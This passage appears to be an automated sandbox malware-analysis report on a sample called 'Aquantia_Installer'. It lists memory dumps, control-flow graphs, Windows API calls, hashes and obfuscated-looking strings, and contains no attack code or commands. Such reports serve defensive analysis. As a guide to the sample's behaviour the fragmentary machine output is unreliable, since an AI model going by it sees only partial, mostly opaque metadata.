                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize___scrt_uninitialize_crt
                                                                        • String ID:
                                                                        • API String ID: 2442719207-0
                                                                        • Opcode ID: d84c8442bed7676ddaeb7968bcd19368ca5db1fd4e6f7ca33f9e37a8e354675c
                                                                        • Instruction ID: 8e0b11b4b85b22cd36b9a00e2c1f5057177a2365669d324f8cf30ab7dc9e6a04
                                                                        • Opcode Fuzzy Hash: d84c8442bed7676ddaeb7968bcd19368ca5db1fd4e6f7ca33f9e37a8e354675c
                                                                        • Instruction Fuzzy Hash: ED41D672E25239ABDB908FE9C800BEE7A74EF45B68F20421AE41597A50C7784D058B90

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1575 6cf2f308-6cf2f319 call 6cf2fac0 1578 6cf2f32a-6cf2f331 1575->1578 1579 6cf2f31b-6cf2f321 1575->1579 1581 6cf2f333-6cf2f336 1578->1581 1582 6cf2f33d-6cf2f351 dllmain_raw 1578->1582 1579->1578 1580 6cf2f323-6cf2f325 1579->1580 1583 6cf2f403-6cf2f412 1580->1583 1581->1582 1584 6cf2f338-6cf2f33b 1581->1584 1585 6cf2f357-6cf2f368 dllmain_crt_dispatch 1582->1585 1586 6cf2f3fa-6cf2f401 1582->1586 1587 6cf2f36e-6cf2f380 call 6cf2e200 1584->1587 1585->1586 1585->1587 1586->1583 1590 6cf2f382-6cf2f384 1587->1590 1591 6cf2f3a9-6cf2f3ab 1587->1591 1590->1591 1594 6cf2f386-6cf2f3a4 call 6cf2e200 call 6cf2f258 dllmain_raw 1590->1594 1592 6cf2f3b2-6cf2f3c3 dllmain_crt_dispatch 1591->1592 1593 6cf2f3ad-6cf2f3b0 1591->1593 1592->1586 1595 6cf2f3c5-6cf2f3f7 dllmain_raw 1592->1595 1593->1586 1593->1592 1594->1591 1595->1586
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                        • String ID:
                                                                        • API String ID: 3136044242-0
                                                                        • Opcode ID: f9e92799d710603e5f9877cdf4b1019726f0b26196f7ee9160741a84283ba7d1
                                                                        • Instruction ID: 263f10ada7b12707771f78568bff901a1067e4b4844f4b77cbf5fff167dc8d8c
                                                                        • Opcode Fuzzy Hash: f9e92799d710603e5f9877cdf4b1019726f0b26196f7ee9160741a84283ba7d1
                                                                        • Instruction Fuzzy Hash: 9D21B572D25239ABDFA18ED5C840EAF3A79EB81BA8F314215F81557A50C7788D018BD0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1601 6cf320ff-6cf32114 GetLastError 1602 6cf32132-6cf3213c call 6cf33d31 1601->1602 1603 6cf32116-6cf32120 call 6cf33cf2 1601->1603 1610 6cf32127 1602->1610 1611 6cf3213e-6cf32145 call 6cf32547 1602->1611 1608 6cf32122-6cf32125 1603->1608 1609 6cf3212d 1603->1609 1608->1610 1612 6cf3219f 1608->1612 1609->1602 1613 6cf32129-6cf3212b 1610->1613 1616 6cf3214a-6cf32150 1611->1616 1615 6cf321a1-6cf321b3 SetLastError 1612->1615 1613->1615 1617 6cf32152-6cf32160 call 6cf33d31 1616->1617 1618 6cf32169-6cf32177 call 6cf33d31 1616->1618 1625 6cf32161-6cf32167 call 6cf325a4 1617->1625 1623 6cf3218a-6cf3219c call 6cf31da9 call 6cf325a4 1618->1623 1624 6cf32179-6cf32188 call 6cf33d31 1618->1624 1623->1612 1624->1625 1625->1613
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,00000001,6CF32539,6CF325CA,?,?,6CF317DC), ref: 6CF32104
                                                                        • _free.LIBCMT ref: 6CF32161
                                                                        • _free.LIBCMT ref: 6CF32197
                                                                        • SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,6CF32539,6CF325CA,?,?,6CF317DC), ref: 6CF321A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast_free
                                                                        • String ID:
                                                                        • API String ID: 2283115069-0
                                                                        • Opcode ID: 7d3dc05bc9f7e054c45cb339cfba7219d3200cb9c40532045fe1dc619e2acf0a
                                                                        • Instruction ID: 901e73acc56f6ae4758b8ef544aedb1dbfe50507e5838a1cd17955bef92822c1
                                                                        • Opcode Fuzzy Hash: 7d3dc05bc9f7e054c45cb339cfba7219d3200cb9c40532045fe1dc619e2acf0a
                                                                        • Instruction Fuzzy Hash: 6C11CA367151257ADB4265A98D88F5F33799FC267D7251225F61C82AC1DB32CC0982E0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1634 6cf2f151-6cf2f15f call 6cf2fac0 call 6cf2f79b 1638 6cf2f164-6cf2f167 1634->1638 1639 6cf2f23e 1638->1639 1640 6cf2f16d-6cf2f185 call 6cf2f6a0 1638->1640 1642 6cf2f240-6cf2f24f 1639->1642 1644 6cf2f250-6cf2f257 call 6cf2f93a 1640->1644 1645 6cf2f18b-6cf2f19c call 6cf2f6fd 1640->1645 1650 6cf2f1eb-6cf2f1f9 call 6cf2f234 1645->1650 1651 6cf2f19e-6cf2f1c0 call 6cf2fa5d call 6cf2f61b call 6cf2f63f call 6cf30d81 1645->1651 1650->1639 1656 6cf2f1fb-6cf2f205 call 6cf2f934 1650->1656 1651->1650 1670 6cf2f1c2-6cf2f1c9 call 6cf2f6d2 1651->1670 1662 6cf2f226-6cf2f22f 1656->1662 1663 6cf2f207-6cf2f210 call 6cf2f85b 1656->1663 1662->1642 1663->1662 1669 6cf2f212-6cf2f224 1663->1669 1669->1662 1670->1650 1674 6cf2f1cb-6cf2f1e8 call 6cf30d3c 1670->1674 1674->1650
                                                                        APIs
                                                                        • __RTC_Initialize.LIBCMT ref: 6CF2F19E
                                                                          • Part of subcall function 6CF2F61B: InitializeSListHead.KERNEL32(6CF8E188,6CF2F1A8,6CF3F0D8,00000010,6CF2F139,?,?,?,6CF2F361,?,00000001,?,?,00000001,?,6CF3F120), ref: 6CF2F620
                                                                        • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CF2F208
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                        • String ID:
                                                                        • API String ID: 3231365870-0
                                                                        • Opcode ID: 37e457febca4b23c842918cc372d6ad11aa4162b64452e8216f00040ab5042fc
                                                                        • Instruction ID: 700615d85bc8d1f243aa50ea52dfc5c3caf40b0e9503849814ff4ef519ba0309
                                                                        • Opcode Fuzzy Hash: 37e457febca4b23c842918cc372d6ad11aa4162b64452e8216f00040ab5042fc
                                                                        • Instruction Fuzzy Hash: 6621D136A26271ABDF80ABF8D401BE93BB09F0772CF11045AD44567FD1CB6E040ECA91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1677 6cf33f7e-6cf33f83 1678 6cf33f85-6cf33f9d 1677->1678 1679 6cf33fab-6cf33fb4 1678->1679 1680 6cf33f9f-6cf33fa3 1678->1680 1682 6cf33fc6 1679->1682 1683 6cf33fb6-6cf33fb9 1679->1683 1680->1679 1681 6cf33fa5-6cf33fa9 1680->1681 1684 6cf34024-6cf34028 1681->1684 1687 6cf33fc8-6cf33fd5 GetStdHandle 1682->1687 1685 6cf33fc2-6cf33fc4 1683->1685 1686 6cf33fbb-6cf33fc0 1683->1686 1684->1678 1688 6cf3402e-6cf34031 1684->1688 1685->1687 1686->1687 1689 6cf33fd7-6cf33fd9 1687->1689 1690 6cf33fe4 1687->1690 1689->1690 1691 6cf33fdb-6cf33fe2 GetFileType 1689->1691 1692 6cf33fe6-6cf33fe8 1690->1692 1691->1692 1693 6cf34006-6cf34018 1692->1693 1694 6cf33fea-6cf33ff3 1692->1694 1693->1684 1695 6cf3401a-6cf3401d 1693->1695 1696 6cf33ff5-6cf33ff9 1694->1696 1697 6cf33ffb-6cf33ffe 1694->1697 1695->1684 1696->1684 1697->1684 1698 6cf34000-6cf34004 1697->1698 1698->1684
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 6CF33FCA
                                                                        • GetFileType.KERNELBASE(00000000), ref: 6CF33FDC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: FileHandleType
                                                                        • String ID:
                                                                        • API String ID: 3000768030-0
                                                                        • Opcode ID: 39fc728d48d94f2efa1696c28afd4827d0fdfa018f8d22193beda1ba5ab97cb9
                                                                        • Instruction ID: a09aafe9d5578a2efa2cd4ac1018b75c8d90e52ce10953e39bb0faa7fb0f0b87
                                                                        • Opcode Fuzzy Hash: 39fc728d48d94f2efa1696c28afd4827d0fdfa018f8d22193beda1ba5ab97cb9
                                                                        • Instruction Fuzzy Hash: 8B11D57260876166CB34893E8C84612BEF49783235B34271AD5BDC79E1C335D48BC5C0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1699 6cf32547-6cf32552 1700 6cf32560-6cf32566 1699->1700 1701 6cf32554-6cf3255e 1699->1701 1703 6cf32568-6cf32569 1700->1703 1704 6cf3257f-6cf32590 RtlAllocateHeap 1700->1704 1701->1700 1702 6cf32594-6cf3259f call 6cf32534 1701->1702 1710 6cf325a1-6cf325a3 1702->1710 1703->1704 1705 6cf32592 1704->1705 1706 6cf3256b-6cf32572 call 6cf34fa6 1704->1706 1705->1710 1706->1702 1712 6cf32574-6cf3257d call 6cf34166 1706->1712 1712->1702 1712->1704
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CF3214A,00000001,00000364,00000013,000000FF,?,00000001,6CF32539,6CF325CA,?,?,6CF317DC), ref: 6CF32588
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: c6d67091a72c1755f0a9f9918b1d0d51dd596691296eedab1fd6c2bae76526b1
                                                                        • Instruction ID: eb123e5023014ea33205fa16163c61053fcd56b09e54e7f470655696b43cb6c1
                                                                        • Opcode Fuzzy Hash: c6d67091a72c1755f0a9f9918b1d0d51dd596691296eedab1fd6c2bae76526b1
                                                                        • Instruction Fuzzy Hash: 46F0E932652634B6EB969A268C5CB4B3B68AF42774B147011EC2CD7985CB32DF0486F0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1876 10201c0-102024b call 10403d0 1880 102025b-102029f call 10403d0 * 3 1876->1880 1881 102024d-1020250 1876->1881 1897 10202b3-10202b5 1880->1897 1882 1020256 1881->1882 1883 1020305-102030f 1881->1883 1886 10206a5-10206a7 1882->1886 1885 1020310-102031b 1883->1885 1885->1885 1888 102031d 1885->1888 1889 1020b94-1020b9b 1886->1889 1891 1020320-1020327 1888->1891 1891->1891 1893 1020329-102032f 1891->1893 1895 1020330-1020337 1893->1895 1895->1895 1898 1020339-1020384 call 1008430 1895->1898 1899 10202b7-10202c7 1897->1899 1900 10202e4-10202ff call 10403d0 1897->1900 1905 1020390-10203af 1898->1905 1907 10202b0 1899->1907 1908 10202c9-10202d5 1899->1908 1900->1883 1900->1886 1905->1905 1909 10203b1-10203cf 1905->1909 1907->1897 1908->1900 1914 10202d7-10202e2 1908->1914 1910 10203d0-10203f5 1909->1910 1910->1910 1913 10203f7-10203ff 1910->1913 1915 1020401-1020406 1913->1915 1916 102041b-1020423 1913->1916 1914->1907 1919 1020410-1020419 1915->1919 1917 1020425-1020429 1916->1917 1918 102043d 1916->1918 1920 1020430-1020439 1917->1920 1921 1020440-1020449 1918->1921 1919->1916 1919->1919 1920->1920 1923 102043b 1920->1923 1924 102045b-1020466 1921->1924 1925 102044b-102044f 1921->1925 1923->1921 1927 102047b-1020589 1924->1927 1928 1020468-1020469 1924->1928 1926 1020450-1020459 1925->1926 1926->1924 1926->1926 1930 1020590-10205a6 1927->1930 1929 1020470-1020479 1928->1929 1929->1927 1929->1929 1930->1930 1931 10205a8-10205ae 1930->1931 1932 10205b0-10205b1 1931->1932 1933 10205cb-10205d4 1931->1933 1936 10205c0-10205c9 1932->1936 1934 10205d6-10205d9 1933->1934 1935 10205eb-1020613 call 10403d0 1933->1935 1937 10205e0-10205e9 1934->1937 1941 1020657-102065a 1935->1941 1942 1020615-1020618 1935->1942 1936->1933 1936->1936 1937->1935 1937->1937 1941->1886 1943 102065c-1020689 call 1008550 call 1020ba0 1941->1943 1942->1941 1944 102061a-1020652 call 10403d0 * 2 1942->1944 1952 102068f-102069c 1943->1952 1953 1020b7c-1020b81 1943->1953 1944->1889 1957 102069e-10206a0 1952->1957 1958 10206ac-10206b9 1952->1958 1955 1020b83-1020b86 1953->1955 1956 1020b91 1953->1956 1955->1956 1960 1020b88-1020b8e call 1008560 1955->1960 1956->1889 1961 1020803-102083f 1957->1961 1962 10206bb 1958->1962 1963 10206bd-10206cb call 1008550 1958->1963 1960->1956 1965 1020840-1020873 1961->1965 1962->1963 1973 10207f0-1020800 1963->1973 1974 10206d1-10206ea 1963->1974 1965->1965 1968 1020875-1020882 1965->1968 1971 1020884-102088e 1968->1971 1972 10208bb-10208be 1968->1972 1977 1020899-102089d 1971->1977 1978 10208c4-10208c7 1972->1978 1979 1020b6b-1020b70 call 101fe90 1972->1979 1973->1961 1975 10206f0-10206f5 1974->1975 1976 102079c-10207d3 1974->1976 1975->1976 1980 10206fb-10206fd 1975->1980 1983 10207e2-10207ed call 1008560 1976->1983 1984 10207d5-10207df 1976->1984 1977->1979 1982 10208a3-10208ac 1977->1982 1985 10208db-10208e2 1978->1985 1987 1020b75 1979->1987 1980->1983 1986 1020703-102071e 1980->1986 1988 10208b4 1982->1988 1989 10208ae-10208b2 1982->1989 1983->1973 1984->1983 1991 10208e4 1985->1991 1992 102090f-102091a call 1020ba0 1985->1992 1993 1020720-1020722 1986->1993 1994 1020737-1020743 1986->1994 1987->1953 1996 1020890-1020897 1988->1996 1997 10208b6-10208b9 1988->1997 1989->1988 1999 10208e6-10208e8 1991->1999 2000 10208ea-1020907 1991->2000 1992->1987 2006 1020920-1020930 1992->2006 2002 1020724-102072e 1993->2002 1994->1983 2004 1020749-102074b 1994->2004 1996->1972 1996->1977 1997->1996 1999->2000 2001 102090a-102090c 1999->2001 2000->2001 2001->1992 2002->2002 2005 1020730-1020734 2002->2005 2007 102074d-1020798 2004->2007 2005->1994 2008 1020932-1020934 2006->2008 2009 1020940-102094d 2006->2009 2007->2007 2010 102079a 2007->2010 2011 1020aa6-1020ad8 2008->2011 2012 1020951-102095f call 1008550 2009->2012 2013 102094f 2009->2013 2010->1983 2015 1020ae0-1020b43 2011->2015 2019 1020a93-1020aa3 2012->2019 2020 1020965-1020981 2012->2020 2013->2012 2015->2015 2017 1020b45-1020b4a 2015->2017 2018 1020b50-1020b5b 2017->2018 2021 10208d0-10208d5 2018->2021 2022 1020b61-1020b64 2018->2022 2019->2011 2023 1020987-102098c 2020->2023 2024 1020a3f-1020a76 2020->2024 2021->1953 2021->1985 2022->2018 2025 1020b66 2022->2025 2023->2024 2028 1020992-1020994 2023->2028 2026 1020a85-1020a90 call 1008560 2024->2026 2027 1020a78-1020a82 2024->2027 2025->2021 2026->2019 2027->2026 2028->2026 2030 102099a-10209b5 2028->2030 2031 10209d3-10209e2 2030->2031 2032 10209b7-10209bb 2030->2032 2031->2026 2035 10209e8-10209ef 2031->2035 2034 10209c0-10209ca 2032->2034 2034->2034 2036 10209cc-10209d0 2034->2036 2037 10209f0-1020a3b 2035->2037 2036->2031 2037->2037 2038 1020a3d 2037->2038 2038->2026
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: - >I$1/$CwGC$VWoh$XTQQ$cWgc$sJwG$wr~5
                                                                        • API String ID: 0-2854300807
                                                                        • Opcode ID: f7970a9a2f6ee8f953afa657c9e1c7b96d6897554a49c0e1f163868920dceb13
                                                                        • Instruction ID: 6135a98297013756a2bbfccee6af13d53c0e667d3dc62e184b5ed790466a8535
                                                                        • Opcode Fuzzy Hash: f7970a9a2f6ee8f953afa657c9e1c7b96d6897554a49c0e1f163868920dceb13
                                                                        • Instruction Fuzzy Hash: 9C521370604B508FD735CF39C880766BFE2BF96210F188AADD4E68BB9AD775A405CB50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %=!$+7-($,0"2$>46:$?$?$@$t
                                                                        • API String ID: 0-1466056752
                                                                        • Opcode ID: 3ecb447a5ca523c94218ac8260823487775fa5b52f8dcaf75c41f601a75e0b54
                                                                        • Instruction ID: f8cdd2b17ac077fb77fdb080cf809c3012e628111c68bab7416664a23cda77ef
                                                                        • Opcode Fuzzy Hash: 3ecb447a5ca523c94218ac8260823487775fa5b52f8dcaf75c41f601a75e0b54
                                                                        • Instruction Fuzzy Hash: 1BA1C67050C3D18AE7228F2995A075BFFE0AFD3648F18499CE5D50B383D379854ACBA6
                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CF2F946
                                                                        • IsDebuggerPresent.KERNEL32 ref: 6CF2FA12
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CF2FA32
                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 6CF2FA3C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                        • String ID:
                                                                        • API String ID: 254469556-0
                                                                        • Opcode ID: 928d34c3ba7f339d3fe05460ca32214b593d68b137178f55173a7f5416ef02b6
                                                                        • Instruction ID: 5d6b383aba88ef73c835315d0dfcc13f9e7661c1712e8b14f6bbc2f0c7692f95
                                                                        • Opcode Fuzzy Hash: 928d34c3ba7f339d3fe05460ca32214b593d68b137178f55173a7f5416ef02b6
                                                                        • Instruction Fuzzy Hash: 083138B5D1522C9BDF50DFA5C9897CCBBF8BF08304F1041AAE40CAB240EB759A888F44
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0W(U$C$\$325
                                                                        • API String ID: 0-3066721790
                                                                        • Opcode ID: 3fc60939445c94076a0867117865b1ae351a6e14082ba8f7396de78f640ed342
                                                                        • Instruction ID: 8e47a2b48bb67da4b2224c2519537208d658489289ee64532ddcbf7fa13ce4e7
                                                                        • Opcode Fuzzy Hash: 3fc60939445c94076a0867117865b1ae351a6e14082ba8f7396de78f640ed342
                                                                        • Instruction Fuzzy Hash: EE121071A083009BE714CF64CC85B5BBBA8AFC5718F048A2CF9D5AB2C0D7B5D905CB92
                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CF323C3
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CF323CD
                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CF323DA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                        • String ID:
                                                                        • API String ID: 3906539128-0
                                                                        • Opcode ID: 67522934e04bff1f4504568d5fc4a4ac2782f71a84fdc7ac3ea540cfa69d200c
                                                                        • Instruction ID: cad2bfe35e26bbe97807730d770bfeca22cec6faac29fb3329b9201b64d2831c
                                                                        • Opcode Fuzzy Hash: 67522934e04bff1f4504568d5fc4a4ac2782f71a84fdc7ac3ea540cfa69d200c
                                                                        • Instruction Fuzzy Hash: FE31B37491122DABCB61DF65D9887CCBBB8BF08314F6041DAE41CA6250EB749B858F84
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(?,?,6CF310C4,?,00000001,?,?), ref: 6CF310E7
                                                                        • TerminateProcess.KERNEL32(00000000,?,6CF310C4,?,00000001,?,?), ref: 6CF310EE
                                                                        • ExitProcess.KERNEL32 ref: 6CF31100
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentExitTerminate
                                                                        • String ID:
                                                                        • API String ID: 1703294689-0
                                                                        • Opcode ID: 313d4d9a2bc4e38f1555f88f7d062106d2ece696bef1318c3cea7a0a8d4d40a4
                                                                        • Instruction ID: 10431f4959aa89e3630f7fed5ba048fa45c795949163657715456c97bdcb1ab5
                                                                        • Opcode Fuzzy Hash: 313d4d9a2bc4e38f1555f88f7d062106d2ece696bef1318c3cea7a0a8d4d40a4
                                                                        • Instruction Fuzzy Hash: 3AE04671518198FBCF226B96C909AC83BBAEB45245B019014F90D86620CB3ED996DAC0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: +dsi$]8
                                                                        • API String ID: 0-3838832768
                                                                        • Opcode ID: 66716b98e0d8f05ff804e0ef4c4cc73eeeeb097e94eeb70f4f6cb06a0b62d575
                                                                        • Instruction ID: 28adfc239f855a6181caae5dbc92c8e09f89ee0be323d0174d138d88409a54bb
                                                                        • Opcode Fuzzy Hash: 66716b98e0d8f05ff804e0ef4c4cc73eeeeb097e94eeb70f4f6cb06a0b62d575
                                                                        • Instruction Fuzzy Hash: E9D20136A512198FCB04CEBCC995BEE7BF2BB46314F10815AD419DBB59D63E8A09DF00
                                                                        Strings
                                                                        Memory Dump Source
